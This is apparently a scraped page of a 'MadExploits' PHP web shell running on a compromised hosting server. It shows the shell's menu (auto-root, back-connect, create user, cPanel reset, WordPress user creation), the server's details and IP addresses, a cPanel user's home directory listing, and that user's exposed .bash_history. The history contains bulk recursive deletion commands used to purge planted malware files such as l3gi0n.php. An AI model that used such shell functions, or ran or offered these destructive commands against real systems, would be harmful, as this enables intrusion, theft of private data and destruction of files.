Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
[ HOME SHELL ]
Name
Size
Permission
Action
.cache
[ DIR ]
drwxr-xr-x
.config
[ DIR ]
drwxr-xr-x
.cpanel
[ DIR ]
drwx------
.cphorde
[ DIR ]
drwx------
.gnupg
[ DIR ]
drwxr-xr-x
.htpasswds
[ DIR ]
drwxr-x---
.koality
[ DIR ]
drwxr-xr-x
.pki
[ DIR ]
drwxr-----
.razor
[ DIR ]
drwxr-xr-x
.security
[ DIR ]
drwx------
.softaculous
[ DIR ]
drwx--x--x
.spamassassin
[ DIR ]
drwxr-xr-x
.ssh
[ DIR ]
drwx------
.trash
[ DIR ]
drwxr-xr-x
access-logs
[ DIR ]
drwxr-x---
etc
[ DIR ]
drwxr-x---
logs
[ DIR ]
drwxr-xr-x
mail
[ DIR ]
drwxr-x--x
perl5
[ DIR ]
drwxr-xr-x
public_ftp
[ DIR ]
drwxr-xr-x
public_html
[ DIR ]
drwxr-x---
ssl
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
www
[ DIR ]
drwxr-x---
.bash_history
7.07
KB
-rw-r--r--
.bash_logout
18
B
-rw-r--r--
.bash_profile
193
B
-rw-r--r--
.bashrc
737
B
-rw-r--r--
.imunify_patch_id
106
B
-rw-r--r--
.lastlogin
627
B
-rw-------
.mad-root
0
B
-rw-r--r--
.myimunify_id
102
B
-rw-r--r--
.spamassassinboxenable
0
B
-rw-r--r--
.spamassassinenable
0
B
-rw-r--r--
.viminfo
21.59
KB
-rw-r--r--
.wp-toolkit-identifier
684
B
-rw-r--r--
backup-4.25.2024_18-14-48_gujo...
3.22
GB
-rw-r--r--
scanlog.1752338364
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .bash_history
#1712238853 crontab -e #1712239037 export VISUAL=vim #1712239041 crontab -e #1712708334 DIRECTORIO_PRINCIPAL="/home/gujo45me/public_html" #1712708334 ARCHIVO_NUEVO="/home/gujo45me/public_html/demo/app/Http/Controllers/XmlController.php" #1712708334 SUBDIRECTORIOS=$(ls -d ${DIRECTORIO_PRINCIPAL}/*/) #1712708334 for SUBDOMINIO in ${SUBDIRECTORIOS}; do ARCHIVO_ORIGINAL="${SUBDOMINIO}app/Http/Controllers/XmlController.php"; if [ -f "$ARCHIVO_ORIGINAL" ]; then yes | cp "${ARCHIVO_NUEVO}" "${ARCHIVO_ORIGINAL}"; echo "Archivo reemplazado en ${ARCHIVO_ORIGINAL}"; else echo "El archivo ${ARCHIVO_ORIGINAL} no existe en ${SUBDOMINIO}"; fi; done #1713404403 crontab -e #1713404420 vim #1713404611 sudo export VISUAL=vi; crontab -e #1713404654 export VISUAL=vim; crontab -e #1713404743 crontab -e #1714612200 export VISUAL=vim; crontab -e #1715986054 DIRECTORIO_PRINCIPAL="/home/gujo45me/public_html" #1715986054 ARCHIVO_NUEVO="/home/gujo45me/public_html/demo/app/Http/Controllers/XmlController.php" #1715986054 SUBDIRECTORIOS=$(ls -d ${DIRECTORIO_PRINCIPAL}/*/) #1715986054 for SUBDOMINIO in ${SUBDIRECTORIOS}; do ARCHIVO_ORIGINAL="${SUBDOMINIO}app/Http/Controllers/XmlController.php"; if [ -f "$ARCHIVO_ORIGINAL" ]; then yes | cp "${ARCHIVO_NUEVO}" "${ARCHIVO_ORIGINAL}"; echo "Archivo reemplazado en ${ARCHIVO_ORIGINAL}"; else echo "El archivo ${ARCHIVO_ORIGINAL} no existe en ${SUBDOMINIO}"; fi; done #1715986054 echo "Proceso completado" #1715986676 DIRECTORIO_PRINCIPAL="/home/gujo45me/public_html" #1715986676 ARCHIVO_NUEVO="/home/gujo45me/public_html/demo/app/Http/Controllers/XmlController.php" #1715986676 SUBDIRECTORIOS=$(ls -d ${DIRECTORIO_PRINCIPAL}/*/) #1715986676 for SUBDOMINIO in ${SUBDIRECTORIOS}; do ARCHIVO_ORIGINAL="${SUBDOMINIO}app/Http/Controllers/XmlController.php"; if [ -f "$ARCHIVO_ORIGINAL" ]; then yes | cp "${ARCHIVO_NUEVO}" "${ARCHIVO_ORIGINAL}"; echo "Archivo reemplazado en ${ARCHIVO_ORIGINAL}"; else echo "El archivo ${ARCHIVO_ORIGINAL} no existe en ${SUBDOMINIO}"; fi; done #1715986676 echo "Proceso completado" #1716253990 export VISUAL=vim; crontab -e #1717463322 crontab -e #1717463372 export VISUAL=vim; crontab -e #1717643858 DIRECTORIO_PRINCIPAL="/home/gujo45me/public_html" #1717643858 ARCHIVO_NUEVO="/home/gujo45me/public_html/demo/app/Helpers/sunat.php" #1717643858 SUBDIRECTORIOS=$(ls -d ${DIRECTORIO_PRINCIPAL}/*/) #1717643858 for SUBDOMINIO in ${SUBDIRECTORIOS}; do ARCHIVO_ORIGINAL="${SUBDOMINIO}app/Helpers/sunat.php"; if [ -f "$ARCHIVO_ORIGINAL" ]; then yes | cp "${ARCHIVO_NUEVO}" "${ARCHIVO_ORIGINAL}"; echo "Archivo reemplazado en ${ARCHIVO_ORIGINAL}"; else echo "El archivo ${ARCHIVO_ORIGINAL} no existe en ${SUBDOMINIO}"; fi; done #1718069835 export VISUAL=vim; crontab -e #1721669625 DIRECTORIO_PRINCIPAL="/home/gujo45me/public_html" #1721669625 ARCHIVO_NUEVO="/home/gujo45me/public_html/demo/app/Http/Controllers/XmlController.php" #1721669625 SUBDIRECTORIOS=$(ls -d ${DIRECTORIO_PRINCIPAL}/*/) #1721669625 for SUBDOMINIO in ${SUBDIRECTORIOS}; do ARCHIVO_ORIGINAL="${SUBDOMINIO}app/Http/Controllers/XmlController.php"; if [ -f "$ARCHIVO_ORIGINAL" ]; then yes | cp "${ARCHIVO_NUEVO}" "${ARCHIVO_ORIGINAL}"; echo "Archivo reemplazado en ${ARCHIVO_ORIGINAL}"; else echo "El archivo ${ARCHIVO_ORIGINAL} no existe en ${SUBDOMINIO}"; fi; done #1722874332 export VISUAL=vim; crontab -e #1731956359 uapi SSL | grep remove #1731956371 uapi SSL | grep exclude #1731956433 uapi #1731956461 uapi SSL get_autossl_excluded_domains #1731956586 ll #1731956607 exit #1748312488 crontab -e #1748312535 export VISUAL=vim; crontab -e #1752333766 find /home/gujo45me -type d \( -name "wp-admin" -o -name "wp-content" -o -name "wp-includes" \) -exec rm -rf {} + 2>/dev/null #1752333862 find /home/gujo45me -type f \( -name "7b3658dfc7.php" -o -name "index.html0" -o -name "item.php" -o -name "rsqorrmf.php" -o -name "search.php" -o -name "server.php" -o -name "uxbzagpc.php" -o -name "wordfence-waf.php" -o -name "wp-call.php" -o -name "wp-log1n.php" \) -exec rm -f {} + 2>/dev/null #1752334829 chmod -R u+rwX /home/gujo45me #1752335813 chown -R gujo45me:gujo45me /home/gujo45me #1752427104 rm -f .env.example .gitignore .htaccess click.php index.php p.php package.json php.ini phpunit.xml readme.md && exit #1761582794 export VISUAL=vim; crontab -e #1762303949 for dir in /home/appseven/public_html/*/; do echo "Revisando: $dir"; rm -f "$dir"l3gi0n.php 2>/dev/null && echo "Eliminado: $dir.doge.php"; rm -f "$dir"Legion 2>/dev/null && echo "Eliminado: $dir.send.php"; rm -f "$dir".term.php 2>/dev/null && echo "Eliminado: $dir.term.php"; done #1762303963 ls #1762304040 cd.. #1762304044 ls #1762304085 cd public_html #1762304089 for dir in /home/appseven/public_html/*/; do echo "Revisando: $dir"; rm -f "$dir"l3gi0n.php 2>/dev/null && echo "Eliminado: $dir.doge.php"; rm -f "$dir"Legion 2>/dev/null && echo "Eliminado: $dir.send.php"; rm -f "$dir".term.php 2>/dev/null && echo "Eliminado: $dir.term.php"; done #1762304249 for dir in /home/appseven/public_html/*/; do echo "Revisando: $dir"; rm -f "$dir"l3gi0n.php 2>/dev/null && echo "Eliminado: $dirl3gi0n.php"; rm -f "$dir"Legion 2>/dev/null && echo "Eliminado: $dirLegion "; done #1762304346 for dir in /home/appseven/public_html/*/; do echo "Revisando: $dir"; rm -f "$dir"l3gi0n.php 2>/dev/null && echo "Eliminado: $dir/l3gi0n.php"; rm -f "$dir"Legion 2>/dev/null && echo "Eliminado: $dir/Legion"; done #1762304484 find / -name "l3gi0n.php" -type f -delete 2>/dev/null #1762304489 find / -name "Legion" -type f -delete 2>/dev/null #1762304645 #!/bin/bash #1762304645 echo "=== ELIMINANDO ARCHIVOS MALICIOSOS ===" #1762304645 # Eliminar archivos específicos #1762304645 find /home /var/www -name "l3gi0n.php" -type f -delete 2>/dev/null #1762304675 find /home /var/www -name "Bg0in.php" -type f -delete 2>/dev/null #1762304694 find /home /var/www -name "Legion.php" -type f -delete 2>/dev/null #1762304717 find /home /var/www -name "Legion" -type f -delete 2>/dev/null #1762304733 echo "Eliminación completada" #1762304733 # Verificar que se eliminaron #1762304733 echo "=== VERIFICANDO QUE SE ELIMINARON ===" #1762304733 find /home /var/www \( -name "l3gi0n.php" -o -name "Bg0in.php" -o -name "Legion.php" -o -name "Legion" \) -type f 2>/dev/null #1762304753 if [ $? -eq 0 ]; then echo "✅ Todos los archivos maliciosos fueron eliminados"; else echo "❌ Algunos archivos podrían seguir existiendo"; #1764905597 export VISUAL=vim; crontab -e #1769560698 find /home /var/www -name "l3gi0n.php" -type f -delete 2>/dev/null #1769560810 find /home -maxdepth 4 -type f -name "l3gi0n.php" 2>/dev/null #1769560811 find /var/www -maxdepth 4 -type f -name "l3gi0n.php" 2>/dev/null #1769560834 find /home -maxdepth 4 -type f -name "l3gi0n.php" -exec rm -f {} \; #1769560834 find /var/www -maxdepth 4 -type f -name "l3gi0n.php" -exec rm -f {} \; #1769560961 find /home /var/www -type f -name "l3gi0n.php" -exec chattr -i {} \; -exec rm -f {} \; 2>/dev/null
Close
